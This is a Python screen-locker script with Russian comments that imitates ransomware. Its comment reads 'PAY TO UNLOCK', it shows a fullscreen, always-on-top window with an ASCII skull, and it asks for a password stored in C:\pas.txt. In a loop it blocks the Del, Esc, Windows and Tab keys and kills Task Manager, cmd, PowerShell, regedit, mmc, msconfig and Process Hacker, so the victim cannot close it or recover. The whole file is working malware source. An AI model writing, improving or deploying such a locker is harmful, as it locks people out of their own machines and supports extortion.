from tkinter import Tk, Entry, Label
import psutil
import keyboard


Taskmgr = 'taskmgr.exe'
cmd = 'cmd.exe'
powershell = 'powershell.exe'
powershell_ise = 'powershell_ise.exe'
regedit = 'regedit.exe'
mmc = 'mmc.exe'
msconfig = 'msconfig.exe'
ProcessHacker = 'ProcessHacker.exe'
iexplore = 'iexplore.exe'
game = 'game.exe'


with open(r'C:\pas.txt', 'r') as pas: # В файл pas.txt пишем свой пароль
    data = pas.read()

def callback(event):
    global k,entry
    if entry.get() == data:
        k = True

def on_closing():
    root.attributes("-fullscreen", True) # на весь экран
    root.attributes('-topmost', 1) # поверх всех окон
    root.protocol("WM_DELETE_WINDOW", on_closing)
    root.update()
    root.bind('<Alt-KeyPress-s>', callback) # Сочетание клавиш, вместо Enter (можно изменить)

root = Tk() # Создание окна
root.title("007") # PAY TO UNLOCK
root.attributes("-fullscreen",True) # Расширение под экран
root.configure(background="#1c1c1c")
entry = Entry(root,show='➤',font='Arial 15', fg="red")# Поле ввода
entry.place(width=350,height=30,x=500,y=400) # Координаты и размеры
label0 = Label(root,text="\n\n\n\n\n\n\n\n\n\n
                 uuuuuuu
             uu$$$$$$$$$$$uu
          uu$$$$$$$$$$$$$$$$$uu
         u$$$$$$$$$$$$$$$$$$$$$u
        u$$$$$$$$$$$$$$$$$$$$$$$u
       u$$$$$$$$$$$$$$$$$$$$$$$$$u
       u$$$$$$$$$$$$$$$$$$$$$$$$$u
       u$$$$$$'   '$$$'   $$$$$$u'
       '$$$$'      u$u       $$$$
        $$$u       u$u       u$$$
        $$$u      u$$$u      u$$$
         '$$$$uu$$$   $$$uu$$$$'
          '$$$$$$$'   '$$$$$$$'
            u$$$$$$$u$$$$$$$u
             u$'$'$'$'$'$'$u
  uuu        $$u$ $ $ $ $u$$       uuu
 u$$$$        $$$$$u$u$u$$$       u$$$$
  $$$$$uu      '$$$$$$$$$'     uu$$$$$$
u$$$$$$$$$$$uu    '''''    uuuu$$$$$$$$$$
$$$$'''$$$$$$$$$$uuu   uu$$$$$$$$$'''$$$'
 '''      ''$$$$$$$$$$$uu '''$'''
           uuuu ''$$$$$$$$$$uuu
  u$$$uuu$$$$$$$$$uu ''$$$$$$$$$$$uuu$$$
  $$$$$$$$$$''''           ''$$$$$$$$$$$'
   '$$$$$'                      ''$$$$''
     $$$'                         $$$$''",font='Arial 5', fg="red", background="#1c1c1c") # Надпись 1
label0.grid(row=0,column=0) # Координаты надписи 1
label1 = Label(root,text="Write the Password and Press Enter",font='Broadway 20', fg="red", background="#1c1c1c") # Надпись 2
label1.place(x=420,y=330) # Координаты надписи 2

def block():
    try:
        keyboard.block_key('Del')
        keyboard.block_key('Esc')
        keyboard.block_key('Windows')
        keyboard.block_key('Tab')
    except:
        return

    try:
        for proc in psutil.process_iter():
            if proc.name() == game:
                proc.kill()

        for proc in psutil.process_iter():
            if proc.name() == iexplore:
                proc.kill()

        for proc in psutil.process_iter():
            if proc.name() == ProcessHacker:
                proc.kill()

        for proc in psutil.process_iter():
            if proc.name() == msconfig:
                proc.kill()

        for proc in psutil.process_iter():
            if proc.name() == mmc:
                proc.kill()

        for proc in psutil.process_iter():
            if proc.name() == regedit:
                proc.kill()

        for proc in psutil.process_iter():
            if proc.name() == Taskmgr:
                proc.kill()

        for proc in psutil.process_iter():
            if proc.name() == cmd:
                proc.kill()

        for proc in psutil.process_iter():
            if proc.name() == powershell:
                proc.kill()

        for proc in psutil.process_iter():
            if proc.name() == powershell_ise:
                proc.kill()
    except:
        return


k = False
while k != True:
    block()
    on_closing()
